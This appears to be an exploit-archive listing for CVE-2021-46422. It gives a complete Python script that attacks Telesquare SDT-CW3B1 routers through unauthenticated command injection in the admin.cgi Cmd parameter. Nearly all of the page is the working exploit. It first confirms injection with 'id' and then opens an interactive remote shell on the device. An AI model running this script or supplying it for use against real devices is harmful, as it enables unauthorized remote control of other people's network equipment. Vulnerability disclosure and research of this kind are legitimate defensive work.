Telesquare SDT-CW3B1 1.1.0 Command Injection

Credit: Bryan Leong
Risk: Medium
Local: No
Remote: Yes

#!/usr/bin/python3 # Exploit Title: Telesquare SDT-CW3B1 1.1.0 - OS Command Injection # Date: 24th May 2022 # Exploit Author: Bryan Leong <NobodyAtall> # Vendor Homepage: # CVE : CVE-2021-46422 # Authentication Required: No import requests import argparse import sys from xml.etree import ElementTree def sysArgument(): ap = argparse.ArgumentParser() ap.add_argument("--host", required=True, help="target hostname/IP") args = vars(ap.parse_args()) return args['host'] def checkHost(host): url = "http://" + host print("[*] Checking host is it alive?") try: rsl = requests.get(url) print("[*] The host is alive.") except requests.exceptions.Timeout as err: raise SystemExit(err) def exploit(host): url = "http://" + host + "/cgi-bin/admin.cgi?Command=sysCommand&Cmd=" #checking does the CGI exists? rsl = requests.get(url) if(rsl.status_code == 200): print("[*] CGI script exist!") print("[*] Injecting some shell command.") #1st test injecting id command cmd = "id" try: rsl = requests.get(url + cmd, stream=True) xmlparser = ElementTree.iterparse(rsl.raw) cmdRet = [] for event, elem in xmlparser: if(elem.tag == 'CmdResult'): cmdRet.append(elem.text) except: print("[!] No XML returned from CGI script. Possible not vulnerable to the exploit") sys.exit(0) if(len(cmdRet) != 0): print("[*] There's response from the CGI script!") print('[*] System ID: ' + cmdRet[0].strip()) print("[*] Spawning shell. type .exit to exit the shell", end="\n\n") #start shell iteration while(True): cmdInput = input("[SDT-CW3B1 Shell]# ") if(cmdInput == ".exit"): print("[*] Exiting shell.") sys.exit(0) rsl = requests.get(url + cmdInput, stream=True) xmlparser = ElementTree.iterparse(rsl.raw) for event, elem in xmlparser: if(elem.tag == 'CmdResult'): print(elem.text.strip()) print('\n') else: print("[!] Something doesn't looks right. Please check the request packet using burpsuite/wireshark/etc.") sys.exit(0) else: print("[!] CGI script not found.") print(rsl.status_code) sys.exit(0) def main(): host = sysArgument() checkHost(host) exploit(host) if __name__ == "__main__": main()

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022,


Back to Top